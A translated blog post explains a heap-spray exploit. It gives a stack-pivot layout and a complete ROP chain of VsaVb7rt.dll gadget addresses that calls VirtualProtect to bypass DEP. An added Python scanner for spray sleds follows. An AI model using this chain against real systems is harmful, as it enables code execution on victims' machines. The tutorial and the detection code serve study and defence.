Heap Spray explained

Please credit the source when reposting. If anything here is wrong, please correct me; I am happy to discuss. --- leibso

   QQ for discussion: 1032633253

1. Detailed explanation

   Although the ROP chain I built here is carefully constructed, it could also be packed into a much smaller space. For testing I set the spacing between the ret gadgets far too large, but that is harmless.

2. Summary:

1. Switching the execution flow onto the stack

   I chose the gadget `xchg eax, esp; pop esi; ret`. EAX holds 0x0c0c0c0c, and the value stored at that EAX position is a stack address (which is useful, because the execution flow cannot modify it). That address cannot be used as an instruction (it would be meaningless), but at this point the stack's protection attributes have not yet been modified, so there is no error. So I chose to move the top of the stack to 0x0c0c0c0c; after the pop, the stack top moves on and control transfers to 0x0c0c0c10. Since 0x0c0c0c10 is not used by the previous execution flow, we can place whatever ret gadget we want there.

  

0x0c0c0c0c // 0x0c0c0c20
0x0c0c0c10 // 0x5e3229ed // add esp,0x10; pop esi; ret
//***
0x0c0c0c20 // 0x5e3229ed // add esp,0x10; pop esi; ret
//***
0x0c0c0c34 // 0x5e3229f0 // pop esi; ret
0x0c0c0c38 // 0x5e28f190 // xchg eax,esp; pop esi; ret

 Analysis: The main idea here is to follow certain features of the existing execution flow and customize the ROP so that execution is switched onto the stack. I had thought that the exploits for this vulnerability posted online relied on the relationship between the two calls; could I use only one call? I tested it right away, and indeed it works. So when I saw someone on the "I Love Cracking" forum flatly assert that this does not work, I felt sorry. You have to get hands-on to find out.

2. Modifying the protection attributes of the stack memory

  

    0x5e329d12 ,   // POP EBP // RETN [VsaVb7rt.dll] 
      0x5e329d12 ,   // skip 4 bytes [VsaVb7rt.dll] 
      0x5e28f7a4 ,   // POP EBX // RETN [VsaVb7rt.dll] 
      0x00000201 ,   // 0x00000201 -> EBX 
      0x5e292c9d ,   // POP EBX // RETN [VsaVb7rt.dll] 
      0x00000040 ,   // 0x00000040 -> edx 
      0x5e34b61c ,   // XOR EDX, EDX // RETN [VsaVb7rt.dll] 
      0x5e34b5ee ,   // ADD EDX, EBX // POP EBX // RETN 0x10 [VsaVb7rt.dll] 
      0x41414141 ,   // Filler (compensate) 
      0x5e26098b ,   // POP ECX // RETN [VsaVb7rt.dll] 
      0x41414141 ,   // Filler (RETN offset compensation) 
      0x41414141 ,   // Filler (RETN offset compensation) 
      0x41414141 ,   // Filler (RETN offset compensation) 
      0x41414141 ,   // Filler (RETN offset compensation) 
      0x5e357285 ,   // &Writable location [VsaVb7rt.dll] -------- this is where OldProtect is stored 
      0x5e25e6cc ,   // POP EDI // RETN [VsaVb7rt.dll] 
      0x5e267102 ,   // RETN (ROP NOP) [VsaVb7rt.dll] 
      0x5e25b1f6 ,   // POP ESI // RETN [VsaVb7rt.dll] 
      0x5e23aa93 ,   // JMP [EAX] [VsaVb7rt.dll] 
      0x5e290c74 ,   // POP EAX // RETN [VsaVb7rt.dll] 
      0x74614224 ,   // ptr to &VirtualProtect() (skipped module criteria, check if pointer is reliable!) [IAT msvcr80.dll] 
      0x5e351384 ,   // PUSHAD // RETN [VsaVb7rt.dll] 
      0x5e287050 ,   // ptr to 'jmp esp' [VsaVb7rt.dll]

  Explanation: Many beginners may not understand this ROP chain well. In fact, it follows the order in which pushad pushes the registers (eax, ecx, edx, ebx, esp, ebp, esi, edi): each register is first loaded with the desired data, then pushad pushes that data onto the stack in exactly that order, and the `jmp esp` springboard then executes the structure that was just laid out. This is how the stack frame that VirtualProtect needs is built. Interested readers can hand-write the specific stack layout produced here to deepen their understanding of this ROP chain.
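As an added example (my own code, not from the post), a small Python scanner that checks a memory region for the two artifacts the post relies on: a long sled of the 0x0c0c0c0c word, and a tight cluster of dwords pointing into one module (the gadget chain). The VsaVb7rt.dll address range and the detection thresholds are assumptions; the sample region is constructed from values quoted in the post.

```python
import struct

SLED_DWORD = 0x0C0C0C0C
# Assumption: address range of VsaVb7rt.dll; every gadget quoted in the
# post falls between 0x5e25xxxx and 0x5e35xxxx.
MODULE_RANGE = (0x5E200000, 0x5E400000)
# A few gadget addresses copied from the post's chain (sample data only).
GADGETS = [0x5E329D12, 0x5E28F7A4, 0x5E292C9D, 0x5E34B61C, 0x5E351384, 0x5E287050]

def scan_spray(buf: bytes, module_range=MODULE_RANGE, sled=SLED_DWORD):
    """Walk a region as little-endian dwords and report heap-spray indicators:
    the longest run of the sled word, how many dwords point into the watched
    module, and the densest 64-byte cluster of such pointers."""
    lo, hi = module_range
    longest = run = 0
    ptr_offsets = []
    for i in range(len(buf) // 4):
        (v,) = struct.unpack_from("<I", buf, i * 4)
        run = run + 1 if v == sled else 0
        longest = max(longest, run)
        if lo <= v < hi:
            ptr_offsets.append(i * 4)
    cluster = 0
    for j, off in enumerate(ptr_offsets):
        k = j
        while k < len(ptr_offsets) and ptr_offsets[k] - off < 64:
            k += 1
        cluster = max(cluster, k - j)
    return {"sled_run": longest, "module_ptrs": len(ptr_offsets), "max_cluster": cluster}

def looks_like_spray(report, min_sled_run=1024, min_cluster=4):
    # Assumed thresholds: a 4 KiB sled of one repeated word plus four or more
    # module pointers within 64 bytes is far outside ordinary heap contents.
    return report["sled_run"] >= min_sled_run and report["max_cluster"] >= min_cluster

def build_sample() -> bytes:
    """Constructed region: a 0x0c0c0c0c sled, the chain fragment, then filler,
    mimicking the layout the post describes."""
    sled = struct.pack("<I", SLED_DWORD) * 2048
    chain = b"".join(struct.pack("<I", g) for g in GADGETS)
    return sled + chain + b"\x41" * 64

if __name__ == "__main__":
    rep = scan_spray(build_sample())
    print(rep, looks_like_spray(rep))
```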


Source: www.cnblogs.com/leibso-cy/p/HeapSpray.html